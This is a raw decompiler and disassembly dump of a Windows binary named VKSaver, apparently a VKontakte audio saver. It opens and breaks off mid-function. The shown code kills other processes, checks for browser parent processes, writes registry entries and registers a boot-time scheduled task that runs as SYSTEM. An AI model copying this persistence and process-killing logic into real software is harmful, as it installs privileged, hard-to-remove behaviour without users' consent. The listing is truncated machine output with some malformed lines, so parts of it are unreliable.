if (0x1ff < uVar11) break;
}
iVar5 = (*kernel32.Process32NextW)();
}
(*kernel32.CloseHandle)();
uVar12 = 0;
if (uVar11 != 0) {
do {
iVar5 = (*kernel32.OpenProcess)();
if (iVar5 != -1) {
(*kernel32.TerminateProcess)();
(*kernel32.CloseHandle)();
}
uVar12 = uVar12 + 1;
} while (uVar12 < uVar11);
}
}
(*kernel32.GetCommandLineW)();
[0x0x4b2010] = 0x11;
004b150c = (*kernel32.GetProcessHeap)();
(*ole32.CoInitializeEx)();
(*shell32.SHGetSpecialFolderPathW)();
piVar8 = 0x4b1e10;
do {
piVar9 = piVar8;
piVar8 = piVar9 + 1;
} while (*piVar9 != 0);
if (*((piVar9 + -0x258f08 >> 1) * 2 + 0x4b1e0e) != 0x5c) {
_wcscat_s();
}
_wcscat_s();
(*kernel32.CreateDirectoryW)();
(*kernel32.GetShortPathNameW)();
_wcscat_s();
_wcscpy_s();
_wcscpy_s();
_wcscpy_s();
_wcscat_s();
_wcscat_s();
_wcscat_s();
_wcscat_s();
_wcscat_s();
iVar5 = _wcsstr();
if (iVar5 != 0) {
004b14ba = 1;
}
iVar5 = _wcsstr();
if (iVar5 == 0) {
iVar5 = sub_406290();
if (iVar5 == 0) {
uVar4 = (*kernel32.GetVersion)();
if (uVar4 < 6) {
(*user32.MessageBoxW)();
goto code_r0x00406bce;
}
[0x0x4b1044] = 100;
}
else {
[0x0x4b1044] = 0;
iVar5 = (*kernel32.FindFirstFileW)();
if (iVar5 != -1) {
(*kernel32.FindClose)();
cVar3 = sub_401060();
if (cVar3 != '\0') {
(*version.GetFileVersionInfoW)();
(*version.VerQueryValueW)();
if ([0x0x14] == 0) {
[0x0x4b1044] = 0xffffffff;
/* listing truncated */0x406090 sub_406090 str 13 api 2 imm 8 Unknown
sub_406090() {
push ebp
mov ebp, esp
push ecx
push esi
mov esi, ecx
test esi, esi
jnz .1
mov al, 0x01
pop esi
mov esp, ebp
pop ebp
ret
.1:
push edi
push 0xFA000
push 0x01
call _calloc()
mov edi, eax
add esp, 0x08
test edi, edi
jz .5
push "NtQuerySystemInformation"
push "ntdll.dll"
call [kernel32.GetModuleHandleW]
push eax
call [kernel32.GetProcAddress]
test eax, eax
jz .7
lea ecx, [ebp-0x04]
push ecx
push 0xFA000
push edi
push 0x05
call eax
cmp dword ptr [edi], 0x00
mov ecx, edi
jz .4
lea esp, [esp]
.2:
cmp [ecx+0x44], esi
jz .3
add ecx, [ecx]
cmp dword ptr [ecx], 0x00
jnz .2
jmp .4
.3:
movzx eax, word ptr [ecx+0x38]
push eax
push [ecx+0x3C]
push 0x470C38
call _wcsncpy()
add esp, 0x0C
.4:
push edi
call _free()
add esp, 0x04
cmp word ptr [0x470C38], 0x00
jnz .6
.5:
pop edi
xor al, al
pop esi
mov esp, ebp
pop ebp
ret
.6:
push "vksaver.exe"
push 0x470C38
call sub_406ed0()
add esp, 0x08
test eax, eax
jz .7
push "explorer.exe"
push 0x470C38
call sub_406ed0()
add esp, 0x08
test eax, eax
jz .7
push "iexplore.exe"
push 0x470C38
call sub_406ed0()
add esp, 0x08
test eax, eax
jz .7
push "firefox.exe"
push 0x470C38
call sub_406ed0()
add esp, 0x08
test eax, eax
jz .7
push "opera.exe"
push 0x470C38
call sub_406ed0()
add esp, 0x08
test eax, eax
jz .7
push "chrome.exe"
push 0x470C38
call sub_406ed0()
add esp, 0x08
test eax, eax
jz .7
push "safari.exe"
push 0x470C38
call sub_406ed0()
add esp, 0x08
test eax, eax
jz .7
push "browser.exe"
push 0x470C38
call sub_406ed0()
add esp, 0x08
test eax, eax
jz .7
push "far.exe"
push 0x470C38
call sub_406ed0()
add esp, 0x08
test eax, eax
jz .7
push "totalcmd.exe"
push 0x470C38
call sub_406ed0()
add esp, 0x08
test eax, eax
jnz .8
.7:
pop edi
mov al, 0x01
pop esi
mov esp, ebp
pop ebp
ret
.8:
push "totalcmd64.exe"
push 0x470C38
call sub_406ed0()
add esp, 0x08
test eax, eax
pop edi
setz al
pop esi
mov esp, ebp
pop ebp
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
bool __fastcall sub_406090(int32_t param_1)
{
int32_t *piVar1;
undefined4 uVar2;
code *pcVar3;
int32_t iVar4;
int32_t *piVar5;
int32_t iStack_8;
if (param_1 == 0) {
return true;
}
iStack_8 = param_1;
piVar1 = _calloc(1, 0xfa000);
if (piVar1 == 0x0) {
return false;
}
uVar2 = (*kernel32.GetModuleHandleW)("ntdll.dll", "NtQuerySystemInformation");
pcVar3 = (*kernel32.GetProcAddress)(uVar2);
if (pcVar3 != 0x0) {
(*pcVar3)(5, piVar1, 0xfa000, &iStack_8);
iVar4 = *piVar1;
piVar5 = piVar1;
while (iVar4 != 0) {
if (piVar5[0x11] == param_1) {
_wcsncpy(0x470c38, piVar5[0xf], *(piVar5 + 0xe));
break;
}
piVar5 = piVar5 + *piVar5;
iVar4 = *piVar5;
}
_free(piVar1);
if ([0x0x470c38] == 0) {
return false;
}
iVar4 = sub_406ed0(0x470c38, "vksaver.exe");
if ((((((iVar4 != 0) && (iVar4 = sub_406ed0(0x470c38, "explorer.exe"), iVar4 != 0)) &&
(iVar4 = sub_406ed0(0x470c38, "iexplore.exe"), iVar4 != 0)) &&
((iVar4 = sub_406ed0(0x470c38, "firefox.exe"), iVar4 != 0 &&
(iVar4 = sub_406ed0(0x470c38, "opera.exe"), iVar4 != 0)))) &&
((iVar4 = sub_406ed0(0x470c38, "chrome.exe"), iVar4 != 0 &&
((iVar4 = sub_406ed0(0x470c38, "safari.exe"), iVar4 != 0 &&
(iVar4 = sub_406ed0(0x470c38, "browser.exe"), iVar4 != 0)))))) &&
((iVar4 = sub_406ed0(0x470c38, "far.exe"), iVar4 != 0 && (iVar4 = sub_406ed0(0x470c38, "totalcmd.exe"), iVar4 != 0))
)) {
iVar4 = sub_406ed0(0x470c38, "totalcmd64.exe");
return iVar4 == 0;
}
}
return true;
}
0x401240 sub_401240 str 10 api 3 imm 9 Unknown
sub_401240() {
push ebp
mov ebp, esp
sub esp, 0x208
mov eax, [0x46F000]
xor eax, ebp
mov [ebp-0x04], eax
push 0x00
lea eax, [ebp-0x208]
push eax
push 0x00
push 0x20006
push 0x00
push 0x00
push 0x00
push "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\VKSaver"
push 0x80000002
call [advapi32.RegCreateKeyExW]
test eax, eax
jz .1
xor al, al
mov ecx, [ebp-0x04]
xor ecx, ebp
call sub_406beb()
mov esp, ebp
pop ebp
ret
.1:
push edi
mov edi, [user32.wsprintfW]
lea eax, [ebp-0x204]
push "VKSaver"
push eax
call edi
lea ecx, [ebp-0x204]
add esp, 0x08
lea edx, [ecx+0x02]
mov edi, edi
.2:
mov ax, [ecx]
add ecx, 0x02
test ax, ax
jnz .2
sub ecx, edx
sar ecx, 0x01
lea ecx, [ecx*2+0x02]
lea eax, [ecx+ecx*1]
cmp eax, 0x200
jnb .10
push esi
mov esi, [advapi32.RegSetValueExW]
xor edx, edx
push ecx
mov [ebp+eax*1-0x204], dx
lea eax, [ebp-0x204]
push eax
push 0x01
push edx
push "DisplayName"
push [ebp-0x208]
call esi
test eax, eax
jnz .6
push 0x4B1A10
lea eax, [ebp-0x204]
push "\"%s\""
push eax
call edi
lea ecx, [ebp-0x204]
add esp, 0x0C
lea edx, [ecx+0x02]
.3:
mov ax, [ecx]
add ecx, 0x02
test ax, ax
jnz .3
sub ecx, edx
sar ecx, 0x01
lea ecx, [ecx*2+0x02]
lea eax, [ecx+ecx*1]
cmp eax, 0x200
jnb .10
xor edx, edx
push ecx
mov [ebp+eax*1-0x204], dx
lea eax, [ebp-0x204]
push eax
push 0x01
push edx
push "DisplayIcon"
push [ebp-0x208]
call esi
test eax, eax
jnz .6
push 0x4B1A10
lea eax, [ebp-0x204]
push "\"%s\" -uninstall"
push eax
call edi
lea ecx, [ebp-0x204]
add esp, 0x0C
lea edx, [ecx+0x02]
.4:
mov ax, [ecx]
add ecx, 0x02
test ax, ax
jnz .4
sub ecx, edx
sar ecx, 0x01
lea ecx, [ecx*2+0x02]
lea eax, [ecx+ecx*1]
cmp eax, 0x200
jnb .10
xor edx, edx
push ecx
mov [ebp+eax*1-0x204], dx
lea eax, [ebp-0x204]
push eax
push 0x01
push edx
push "UninstallString"
push [ebp-0x208]
call esi
test eax, eax
jnz .6
push 0x4B1A10
lea eax, [ebp-0x204]
push 0x46AFBC
push eax
call edi
lea ecx, [ebp-0x204]
add esp, 0x0C
lea edx, [ecx+0x02]
lea ebx, [ebx]
.5:
mov ax, [ecx]
add ecx, 0x02
test ax, ax
jnz .5
sub ecx, edx
sar ecx, 0x01
lea ecx, [ecx*2+0x02]
lea eax, [ecx+ecx*1]
cmp eax, 0x200
jnb .10
xor edx, edx
push ecx
mov [ebp+eax*1-0x204], dx
lea eax, [ebp-0x204]
push eax
push 0x01
push edx
push "Publisher"
push [ebp-0x208]
call esi
test eax, eax
jz .8
.6:
push [ebp-0x208]
.7:
call [advapi32.RegCloseKey]
pop esi
xor al, al
pop edi
mov ecx, [ebp-0x04]
xor ecx, ebp
call sub_406beb()
mov esp, ebp
pop ebp
ret
.8:
push [0x4B1508]
lea eax, [ebp-0x204]
push [0x4B1504]
push [0x4B1500]
push [0x4B14FC]
push "%d.%d.%d.%d"
push eax
call edi
lea ecx, [ebp-0x204]
add esp, 0x18
lea edx, [ecx+0x02]
lea ebx, [ebx]
.9:
mov ax, [ecx]
add ecx, 0x02
test ax, ax
jnz .9
sub ecx, edx
sar ecx, 0x01
lea ecx, [ecx*2+0x02]
lea eax, [ecx+ecx*1]
cmp eax, 0x200
jnb .10
xor edx, edx
push ecx
mov [ebp+eax*1-0x204], dx
lea eax, [ebp-0x204]
push eax
push 0x01
push edx
push "DisplayVersion"
push [ebp-0x208]
call esi
push [ebp-0x208]
test eax, eax
jnz .7
call [advapi32.RegCloseKey]
mov ecx, [ebp-0x04]
pop esi
xor ecx, ebp
mov al, 0x01
pop edi
call sub_406beb()
mov esp, ebp
pop ebp
ret
.10:
call ___report_rangecheckfailure()
}
/* DISPLAY WARNING: Type casts are NOT being printed */
void sub_401240(void)
{
int16_t iVar1;
code *pcVar2;
uint32_t uVar3;
code *pcVar4;
int32_t iVar5;
int16_t *piVar6;
undefined4 uStack_20c;
int16_t iStack_208;
undefined auStack_206 [510];
uint32_t uStack_8;
uStack_8 = [0x0x46f000#SecurityCookie] ^ &stack0xfffffffc;
iVar5 = (*advapi32.RegCreateKeyExW)(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\VKSaver", 0, 0, 0, 0x20006, 0, &uStack_20c, 0);
pcVar2 = user32.wsprintfW;
if (iVar5 != 0) {
sub_406beb();
return;
}
(*user32.wsprintfW)(&iStack_208, "VKSaver");
pcVar4 = advapi32.RegSetValueExW;
piVar6 = &iStack_208;
do {
iVar1 = *piVar6;
piVar6 = piVar6 + 1;
} while (iVar1 != 0);
iVar5 = (piVar6 - auStack_206 >> 1) * 2 + 2;
uVar3 = iVar5 * 2;
if (uVar3 < 0x200) {
*(auStack_206 + (uVar3 - 2)) = 0;
iVar5 = (*advapi32.RegSetValueExW)(uStack_20c, "DisplayName", 0, 1, &iStack_208, iVar5);
if (iVar5 == 0) {
(*pcVar2)(&iStack_208, "\"%s\"", 0x4b1a10);
piVar6 = &iStack_208;
do {
iVar1 = *piVar6;
piVar6 = piVar6 + 1;
} while (iVar1 != 0);
iVar5 = (piVar6 - auStack_206 >> 1) * 2 + 2;
uVar3 = iVar5 * 2;
if (0x1ff < uVar3) goto code_r0x00401508;
*(auStack_206 + (uVar3 - 2)) = 0;
iVar5 = (*pcVar4)(uStack_20c, "DisplayIcon", 0, 1, &iStack_208, iVar5);
if (iVar5 == 0) {
(*pcVar2)(&iStack_208, "\"%s\" -uninstall", 0x4b1a10);
piVar6 = &iStack_208;
do {
iVar1 = *piVar6;
piVar6 = piVar6 + 1;
} while (iVar1 != 0);
iVar5 = (piVar6 - auStack_206 >> 1) * 2 + 2;
uVar3 = iVar5 * 2;
if (0x1ff < uVar3) goto code_r0x00401508;
*(auStack_206 + (uVar3 - 2)) = 0;
iVar5 = (*pcVar4)(uStack_20c, "UninstallString", 0, 1, &iStack_208, iVar5);
if (iVar5 == 0) {
(*pcVar2)(&iStack_208, 0x46afbc, 0x4b1a10);
piVar6 = &iStack_208;
do {
iVar1 = *piVar6;
piVar6 = piVar6 + 1;
} while (iVar1 != 0);
iVar5 = (piVar6 - auStack_206 >> 1) * 2 + 2;
uVar3 = iVar5 * 2;
if (0x1ff < uVar3) goto code_r0x00401508;
*(auStack_206 + (uVar3 - 2)) = 0;
iVar5 = (*pcVar4)(uStack_20c, "Publisher", 0, 1, &iStack_208, iVar5);
if (iVar5 == 0) {
(*pcVar2)(&iStack_208, "%d.%d.%d.%d", [0x0x4b14fc], [0x0x4b1500], [0x0x4b1504], [0x0x4b1508]);
piVar6 = &iStack_208;
do {
iVar1 = *piVar6;
piVar6 = piVar6 + 1;
} while (iVar1 != 0);
iVar5 = (piVar6 - auStack_206 >> 1) * 2 + 2;
uVar3 = iVar5 * 2;
if (0x1ff < uVar3) goto code_r0x00401508;
*(auStack_206 + (uVar3 - 2)) = 0;
iVar5 = (*pcVar4)(uStack_20c, "DisplayVersion", 0, 1, &iStack_208, iVar5);
if (iVar5 == 0) {
(*advapi32.RegCloseKey)(uStack_20c);
sub_406beb();
return;
}
}
}
}
}
(*advapi32.RegCloseKey)(uStack_20c);
sub_406beb();
return;
}
code_r0x00401508:
___report_rangecheckfailure();
pcVar2 = swi(3);
(*pcVar2)();
return;
}
0x4029B0 sub_4029b0 str 7 api 7 imm 10 Unknown
sub_4029b0() {
push ebp
mov ebp, esp
sub esp, 0xA20
mov eax, [0x46F000]
xor eax, ebp
mov [ebp-0x04], eax
lea eax, [ebp-0xA1C]
push eax
push 0x02
push 0x00
push "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
push 0x80000002
call [advapi32.RegOpenKeyExW]
test eax, eax
jnz .1
push "VKSaverUpdater"
push [ebp-0xA1C]
call [advapi32.RegDeleteValueW]
push [ebp-0xA1C]
call [advapi32.RegCloseKey]
.1:
lea eax, [ebp-0xA1C]
push eax
push 0x01
push 0x00
push "SOFTWARE\\VKSaver"
push 0x80000002
call [advapi32.RegOpenKeyExW]
test eax, eax
jz .2
mov byte ptr [0x4B14BA], 0x00
mov ecx, [ebp-0x04]
xor ecx, ebp
call sub_406beb()
mov esp, ebp
pop ebp
ret
.2:
push 0x400
lea eax, [ebp-0xA18]
push 0x00
push eax
mov dword ptr [ebp-0xA20], 0x400
call _memset()
add esp, 0x0C
lea eax, [ebp-0xA20]
push eax
lea eax, [ebp-0xA18]
push eax
push 0x00
push 0x00
push "Install_Dir"
push [ebp-0xA1C]
call [advapi32.RegQueryValueExW]
push [ebp-0xA1C]
call [advapi32.RegCloseKey]
xor ecx, ecx
jmp .3
.3:
movzx eax, word ptr [ecx+"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\VKSaver"]
mov [ebp+ecx*1-0x618], ax
lea ecx, [ecx+0x02]
test ax, ax
jnz .3
lea edx, [ebp-0x618]
mov ecx, 0x80000002
call sub_402820()
xor edx, edx
lea esp, [esp]
.4:
movzx eax, word ptr [edx+"SOFTWARE\\VKSaver"]
mov [ebp+edx*1-0x618], ax
lea edx, [edx+0x02]
test ax, ax
jnz .4
lea edx, [ebp-0x618]
mov ecx, 0x80000002
call sub_402820()
cmp word ptr [ebp-0xA18], 0x00
jz .5
push 0x00
lea ecx, [ebp-0xA18]
call sub_4025e0()
add esp, 0x04
jmp .6
.5:
mov byte ptr [0x4B14BA], 0x00
.6:
push 0x00
push 0x17
lea eax, [ebp-0x208]
push eax
push 0x00
call [shell32.SHGetSpecialFolderPathW]
push "\\VKSaver"
lea eax, [ebp-0x208]
push 0x100
push eax
call _wcscat_s()
add esp, 0x0C
lea ecx, [ebp-0x208]
push 0x01
call sub_4025e0()
mov ecx, [ebp-0x04]
xor ecx, ebp
add esp, 0x04
call sub_406beb()
mov esp, ebp
pop ebp
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
void sub_4029b0(void)
{
int16_t iVar1;
int32_t iVar2;
undefined4 uStack_a24;
undefined4 uStack_a20;
int16_t aiStack_a1c [512];
int16_t aiStack_61c [520];
undefined auStack_20c [516];
uint32_t uStack_8;
uStack_8 = [0x0x46f000#SecurityCookie] ^ &stack0xfffffffc;
iVar2 = (*advapi32.RegOpenKeyExW)(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 2, &uStack_a20);
if (iVar2 == 0) {
(*advapi32.RegDeleteValueW)(uStack_a20, "VKSaverUpdater");
(*advapi32.RegCloseKey)(uStack_a20);
}
iVar2 = (*advapi32.RegOpenKeyExW)(0x80000002, "SOFTWARE\\VKSaver", 0, 1, &uStack_a20);
if (iVar2 != 0) {
[0x0x4b14ba] = 0;
sub_406beb();
return;
}
uStack_a24 = 0x400;
_memset(aiStack_a1c, 0, 0x400);
(*advapi32.RegQueryValueExW)(uStack_a20, "Install_Dir", 0, 0, aiStack_a1c, &uStack_a24);
(*advapi32.RegCloseKey)(uStack_a20);
iVar2 = 0;
do {
iVar1 = *(iVar2 + "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\VKSaver");
*(aiStack_61c + iVar2) = iVar1;
iVar2 = iVar2 + 2;
} while (iVar1 != 0);
sub_402820();
iVar2 = 0;
do {
iVar1 = *(iVar2 + "SOFTWARE\\VKSaver");
*(aiStack_61c + iVar2) = iVar1;
iVar2 = iVar2 + 2;
} while (iVar1 != 0);
sub_402820();
if (aiStack_a1c[0] == 0) {
[0x0x4b14ba] = 0;
}
else {
sub_4025e0(0);
}
(*shell32.SHGetSpecialFolderPathW)(0, auStack_20c, 0x17, 0);
_wcscat_s(auStack_20c, 0x100, "\\VKSaver");
sub_4025e0(1);
sub_406beb();
return;
}
0x401BD0 sub_401bd0 str 7 api 5 imm 10 Unknown
sub_401bd0() {
push ebp
mov ebp, esp
sub esp, 0xA4
mov eax, [0x46F000]
xor eax, ebp
mov [ebp-0x04], eax
movq xmm0, qword ptr [0x46AD78]
push ebx
xor eax, eax
movq [ebp-0x24], xmm0
movq xmm0, qword ptr [0x46AD80]
push 0x02
push eax
mov bl, cl
mov dword ptr [ebp-0x50], 0x00
mov dword ptr [ebp-0x4C], 0x00
mov dword ptr [ebp-0x5C], 0x00
mov dword ptr [ebp-0x54], 0x00
mov [ebp-0xA0], ax
movq [ebp-0x1C], xmm0
call [ole32.CoInitializeEx]
push 0x00
push 0x00
push 0x00
push 0x03
push 0x06
push 0x00
push 0x00
push 0xFFFFFFFF
push 0x00
call [ole32.CoInitializeSecurity]
movq xmm0, qword ptr [ITaskService]
lea eax, [ebp-0x50]
push eax
lea eax, [ebp-0x44]
push eax
push 0x01
movq [ebp-0x44], xmm0
movq xmm0, qword ptr [0x46AD90]
push 0x00
lea eax, [ebp-0x24]
push eax
movq [ebp-0x3C], xmm0
call [ole32.CoCreateInstance]
mov edx, [ebp-0x50]
test edx, edx
jnz .2
.1:
xor al, al
pop ebx
mov ecx, [ebp-0x04]
xor ecx, ebp
call sub_406beb()
mov esp, ebp
pop ebp
ret
.2:
movq xmm0, qword ptr [ebp-0xA0]
movq xmm1, qword ptr [ebp-0x98]
mov ecx, [edx]
sub esp, 0x10
mov eax, esp
sub esp, 0x10
movq [eax], xmm0
movq [eax+0x08], xmm1
mov eax, esp
sub esp, 0x10
movq [eax], xmm0
movq [eax+0x08], xmm1
mov eax, esp
sub esp, 0x10
movq [eax], xmm0
movq [eax+0x08], xmm1
mov eax, esp
push edx
movq [eax], xmm0
movq [eax+0x08], xmm1
call [ecx+0x28]
mov eax, [ebp-0x50]
lea edx, [ebp-0x4C]
mov ecx, [eax]
push edx
push 0x46B11C
push eax
call [ecx+0x1C]
mov eax, [ebp-0x4C]
push 0x00
mov ecx, [eax]
push "VKSaver"
push eax
call [ecx+0x3C]
mov eax, [ebp-0x4C]
push 0x00
mov ecx, [eax]
push "VKSaverUpdate"
push eax
call [ecx+0x3C]
mov eax, [ebp-0x50]
lea edx, [ebp-0x48]
mov ecx, [eax]
push edx
push 0x00
push eax
call [ecx+0x24]
mov eax, [ebp-0x50]
push eax
mov ecx, [eax]
call [ecx+0x08]
mov eax, [ebp-0x48]
lea edx, [ebp-0x58]
mov ecx, [eax]
push edx
push eax
call [ecx+0x1C]
mov eax, [ebp-0x58]
push "AudioVkontakte.ru"
mov ecx, [eax]
push eax
call [ecx+0x28]
mov eax, [ebp-0x58]
push 0x46B148
mov ecx, [eax]
push eax
call [ecx+0x20]
mov eax, [ebp-0x58]
push eax
mov ecx, [eax]
call [ecx+0x08]
mov eax, [ebp-0x48]
lea edx, [ebp-0x74]
mov ecx, [eax]
push edx
push eax
call [ecx+0x2C]
mov eax, [ebp-0x74]
push 0x01
mov ecx, [eax]
push eax
call [ecx+0x58]
mov eax, [ebp-0x74]
push eax
mov ecx, [eax]
call [ecx+0x08]
mov eax, [ebp-0x48]
lea edx, [ebp-0x6C]
mov ecx, [eax]
push edx
push eax
call [ecx+0x24]
mov eax, [ebp-0x6C]
lea edx, [ebp-0x78]
push edx
mov dword ptr [ebp-0x60], 0x00
mov ecx, [eax]
push 0x08
push eax
call [ecx+0x28]
mov eax, [ebp-0x6C]
push eax
mov ecx, [eax]
call [ecx+0x08]
movq xmm0, qword ptr [IBootTrigger]
mov eax, [ebp-0x78]
lea edx, [ebp-0x60]
push edx
movq [ebp-0x14], xmm0
movq xmm0, qword ptr [0x46ADA0]
lea edx, [ebp-0x14]
movq [ebp-0x0C], xmm0
mov ecx, [eax]
push edx
push eax
call [ecx]
mov eax, [ebp-0x78]
push eax
mov ecx, [eax]
call [ecx+0x08]
mov ecx, [ebp-0x60]
test ecx, ecx
jz .1
mov eax, [ecx]
push 0x46B18C
push ecx
call [eax+0x24]
mov eax, [ebp-0x48]
lea edx, [ebp-0x7C]
mov ecx, [eax]
push edx
push eax
call [ecx+0x3C]
mov eax, [ebp-0x7C]
push 0x01
mov ecx, [eax]
push eax
call [ecx+0x48]
mov eax, [ebp-0x48]
lea edx, [ebp-0x68]
mov ecx, [eax]
push edx
push eax
call [ecx+0x44]
mov eax, [ebp-0x68]
lea edx, [ebp-0x64]
mov ecx, [eax]
push edx
push 0x00
push eax
call [ecx+0x30]
mov eax, [ebp-0x68]
push eax
mov ecx, [eax]
call [ecx+0x08]
movq xmm0, qword ptr [IExecAction]
mov eax, [ebp-0x64]
lea edx, [ebp-0x54]
push edx
movq [ebp-0x34], xmm0
movq xmm0, qword ptr [0x46AD20]
lea edx, [ebp-0x34]
; listing truncated
/* WARNING: Globals starting with '_' overlap smaller symbols at the same address */
/* DISPLAY WARNING: Type casts are NOT being printed */
void __fastcall sub_401bd0(char param_1)
{
undefined4 uVar1;
undefined4 uVar2;
int32_t *piVar3;
int64_t iVar4;
undefined8 uVar5;
undefined4 uVar6;
undefined4 uVar7;
undefined4 uVar8;
undefined4 uVar9;
undefined4 uVar10;
undefined4 uVar11;
undefined8 uVar12;
int64_t iVar13;
undefined8 uVar14;
unkuint6 Stack_a2;
undefined8 uStack_9c;
unkbyte6 Stack_92;
undefined4 uStack_88;
int32_t *piStack_80;
int32_t *piStack_7c;
int32_t *piStack_78;
int32_t *piStack_74;
int32_t *piStack_70;
int32_t *piStack_6c;
int32_t *piStack_68;
int32_t *piStack_64;
int32_t *piStack_60;
int32_t *piStack_5c;
int32_t *piStack_58;
int32_t *piStack_54;
int32_t *piStack_50;
int32_t *piStack_4c;
undefined8 uStack_48;
undefined8 uStack_40;
undefined8 uStack_38;
undefined8 uStack_30;
undefined8 uStack_28;
undefined8 uStack_20;
undefined8 uStack_18;
undefined8 uStack_10;
uint32_t uStack_8;
uStack_8 = [0x0x46f000#SecurityCookie] ^ &stack0xfffffffc;
uStack_28 = [0x0x46ad78];
piStack_54 = 0x0;
piStack_50 = 0x0;
piStack_60 = 0x0;
piStack_58 = 0x0;
uStack_20 = [0x0x46ad80];
(*ole32.CoInitializeEx)(0, 2);
(*ole32.CoInitializeSecurity)(0, 0xffffffff, 0, 0, 6, 3, 0, 0, 0);
uStack_48 = ITaskService;
uStack_40 = [0x0x46ad90];
(*ole32.CoCreateInstance)(&uStack_28, 0, 1, &uStack_48, &piStack_54);
if (piStack_54 != 0x0) {
iVar4 = Stack_a2 << 0x10;
uVar8 = iVar4;
uVar10 = Stack_a2 >> 0x10;
uVar6 = uStack_9c >> 0x20;
uVar5 = uStack_9c;
uVar1 = uVar10;
uVar2 = uStack_9c;
uVar7 = uVar6;
uVar9 = uVar8;
uVar11 = uVar10;
uVar12 = uStack_9c;
iVar13 = iVar4;
uVar14 = uStack_9c;
piVar3 = piStack_54;
(**(*piStack_54 + 0x28))();
(**(*piStack_54 + 0x1c))
(piStack_54, 0x46b11c, &piStack_50, piVar3, iVar4, uVar5, uVar8, uVar1, uVar2, uVar7, uVar9, uVar11,
uVar12, iVar13, uVar14);
(**(*piStack_50 + 0x3c))(piStack_50, "VKSaver", 0);
uVar2 = 0;
uVar1 = "VKSaverUpdate";
piVar3 = piStack_50;
(**(*piStack_50 + 0x3c))();
(**(*piStack_54 + 0x24))(piStack_54, 0, &piStack_4c, piVar3, uVar1, uVar2);
(**(*piStack_54 + 8))(piStack_54);
(**(*piStack_4c + 0x1c))(piStack_4c, &piStack_5c);
(**(*piStack_5c + 0x28))(piStack_5c, "AudioVkontakte.ru");
(**(*piStack_5c + 0x20))(piStack_5c, 0x46b148);
(**(*piStack_5c + 8))(piStack_5c);
(**(*piStack_4c + 0x2c))(piStack_4c, &piStack_78);
(**(*piStack_78 + 0x58))(piStack_78, 1);
(**(*piStack_78 + 8))(piStack_78);
(**(*piStack_4c + 0x24))(piStack_4c, &piStack_70);
piStack_64 = 0x0;
(**(*piStack_70 + 0x28))(piStack_70, 8, &piStack_7c);
(**(*piStack_70 + 8))(piStack_70);
uStack_18 = IBootTrigger;
uStack_10 = [0x0x46ada0];
(***piStack_7c)(piStack_7c, &uStack_18, &piStack_64);
(**(*piStack_7c + 8))(piStack_7c);
if (piStack_64 != 0x0) {
(**(*piStack_64 + 0x24))(piStack_64, 0x46b18c);
(**(*piStack_4c + 0x3c))(piStack_4c, &piStack_80);
(**(*piStack_80 + 0x48))(piStack_80, 1);
(**(*piStack_4c + 0x44))(piStack_4c, &piStack_6c);
(**(*piStack_6c + 0x30))(piStack_6c, 0, &piStack_68);
(**(*piStack_6c + 8))(piStack_6c);
uStack_38 = IExecAction;
uStack_30 = [0x0x46ad20];
uVar5 = CONCAT44(&piStack_58, &uStack_38);
piVar3 = piStack_68;
(***piStack_68)();
(**(*piStack_68 + 8))(piStack_68, piVar3, uVar5);
if (piStack_58 != 0x0) {
(**(*piStack_58 + 0x2c))(piStack_58, 0x4b1a10);
(**(*piStack_58 + 0x34))(piStack_58, "-autoupdate");
(**(*piStack_58 + 8))();
uVar1 = (*oleaut32.SysAllocString)("NT AUTHORITY\\SYSTEM");
(**(*piStack_50 + 0x44))
(piStack_50, "VKSaverUpdate", piStack_4c, 6, CONCAT62(Stack_92, 8), CONCAT44(uStack_88, uVar1),
Stack_a2 << 0x10, uStack_9c, 5, Stack_a2 << 0x10, uVar10, uStack_9c, uVar6, &piStack_60);
if ((param_1 != '\0') && (piStack_60 != 0x0)) {
piStack_74 = 0x0;
(**(*piStack_60 + 0x30))(piStack_60, CONCAT62(Stack_92, 1), CONCAT44(uStack_88, uVar1), &piStack_74)
;
if (piStack_74 != 0x0) {
(**(*piStack_74 + 8))(piStack_74);
}
}
(**(*piStack_50 + 8))(piStack_50);
(**(*piStack_4c + 8))();
if (piStack_60 != 0x0) {
(**(*piStack_60 + 8))(piStack_60);
}
(*ole32.CoUninitialize)();
sub_406beb();
return;
}
}
}
sub_406beb();
return;
}
0x401740 sub_401740 str 7 api 4 imm 12 Unknown
sub_401740() {
push ebp
mov ebp, esp
sub esp, 0x238
mov eax, [0x46F000]
xor eax, ebp
mov [ebp-0x04], eax
push ebx
mov ebx, [ebp+0x08]
push esi
push edi
push 0x00
push 0x02
mov esi, edx
mov edi, ecx
mov dword ptr [ebp-0x234], 0x00
call [kernel32.CreateToolhelp32Snapshot]
push 0x228
mov [ebp-0x238], eax
lea eax, [ebp-0x22C]
push 0x00
push eax
call _memset()
add esp, 0x0C
lea eax, [ebp-0x230]
push eax
push [ebp-0x238]
mov dword ptr [ebp-0x230], 0x22C
call [kernel32.Process32FirstW]
test eax, eax
jz .13
.1:
lea eax, [ebp-0x20C]
push "iexplore.exe"
push eax
call sub_406ed0()
add esp, 0x08
test eax, eax
jnz .2
mov eax, 0x01
jmp .8
.2:
lea eax, [ebp-0x20C]
push "firefox.exe"
push eax
call sub_406ed0()
add esp, 0x08
test eax, eax
jnz .3
mov eax, 0x02
jmp .8
.3:
lea eax, [ebp-0x20C]
push "opera.exe"
push eax
call sub_406ed0()
add esp, 0x08
test eax, eax
jnz .4
mov eax, 0x04
jmp .8
.4:
lea eax, [ebp-0x20C]
push "chrome.exe"
push eax
call sub_406ed0()
add esp, 0x08
test eax, eax
jnz .5
mov eax, 0x08
jmp .8
.5:
lea eax, [ebp-0x20C]
push "safari.exe"
push eax
call sub_406ed0()
add esp, 0x08
test eax, eax
jnz .6
mov eax, 0x10
jmp .8
.6:
lea eax, [ebp-0x20C]
push "browser.exe"
push eax
call sub_406ed0()
add esp, 0x08
test eax, eax
jnz .7
mov eax, 0x20
jmp .8
.7:
lea eax, [ebp-0x20C]
push "maxthon.exe"
push eax
call sub_406ed0()
add esp, 0x08
test eax, eax
